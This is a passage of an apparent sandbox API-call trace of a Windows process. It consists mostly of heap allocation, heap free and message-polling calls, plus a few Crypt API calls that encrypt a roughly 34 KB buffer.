(HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2b8 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.584] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.584] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.585] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0040.586] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.586] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0040.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.588] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da238, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da238*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.588] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.589] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.589] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.589] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.589] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.589] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.589] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.589] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.589] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.590] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.590] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.590] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.590] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x86d1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x86e0) returned 1 [0040.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.590] CharLowerBuffW (in: lpsz="byte[34529]", cchLength=0xb | out: lpsz="byte[34529]") returned 0xb [0040.591] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.592] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.592] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.592] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadb4b8*, pdwDataLen=0x6ae220*=0x86d1, dwBufLen=0x86e0 | out: pbData=0xadb4b8*, pdwDataLen=0x6ae220*=0x86e0) returned 1 [0040.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.593] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.593] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.594] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.594] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.594] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.594] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") 